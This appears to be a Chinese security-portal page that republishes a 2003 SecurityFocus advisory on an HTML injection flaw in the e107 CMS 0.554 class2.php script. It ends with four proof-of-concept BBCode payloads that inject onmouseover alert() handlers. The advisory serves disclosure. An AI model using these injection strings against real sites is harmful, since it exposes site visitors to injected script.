<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("issue,vulnerability") PageTitle=stripHTML("e107 Website System 0.554 HTML Injection Vulnerability") ArticleIntro=stripHTML("77169.com小编引言:e107 Website System 0.554 HTML Injection Vulnerability,漏洞的主要原因:") Articlecontent=stripHTML("source: http://www.securityfocus.com/bid/8279/info

The e107 content management …") ModuleName = stripHTML("exploits") InfoID = stripHTML("170652") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> e107 Website System 0.554 HTML Injection Vulnerability - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

e107 Website System 0.554 HTML Injection Vulnerability

2003/7/23 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
source: http://www.securityfocus.com/bid/8279/info

The e107 content management system is prone to an HTML injection vulnerability. This issue is exposed through the class2.php script. An attacker may exploit this issue by including hostile HTML and script code in certain fields within the form. This code may be rendered in the web browser of a user who views the site.

[img][/img] - [img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link][/link] - [link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email][/email] - [email]/foo@bar.com" onmouseover="alert('Vulnerable');[/email]
[url][/url] - [url]/url.htm" onmouseover="alert('Vulnerable');[/url]